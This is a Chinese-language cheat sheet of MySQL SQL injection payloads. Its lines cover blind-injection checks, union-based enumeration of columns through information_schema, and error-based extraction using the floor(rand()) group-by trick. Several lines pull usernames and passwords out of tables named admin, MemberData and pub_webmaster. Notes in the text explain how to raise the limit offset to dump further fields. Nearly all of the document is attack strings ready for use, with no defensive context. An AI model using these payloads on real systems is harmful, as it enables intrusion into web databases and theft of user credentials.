盲注查询:
and (select count(*) from mysql.user)>0 (97,100,109,105,110)为admin的ascii码 依次类推
and+1=2+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.columns+where+table_name=爆出来的表名的hex值+and+table_schema=数据库名的hex值+order+by+1+limit+0,1)t+limit+1--
注:其中“limit+0,1)”中的0可以一直增加来查看多个字段
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x70726F64756374 and table_name=0x61646D696E limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
修改“table_name”后面的“limit 0,1”可爆多个字段
####################################################################################################################################################################################################################################################################################################################################
################################# 查看字段内容: #############################################
and+1=2+union+select+1,2,3,concat(md_pw),5,6,7,8,9,10,11,12,13+from+MemberData
newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAt(DISTINCT+username,0x5f,userpwd),8,9,10,11,12+from+pub_webmaster
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
union select 1,group_concat(username,0x3a,password),3,4,5... from 表(或表的hex值)
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,admin.username,0x27,0x7e) from admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
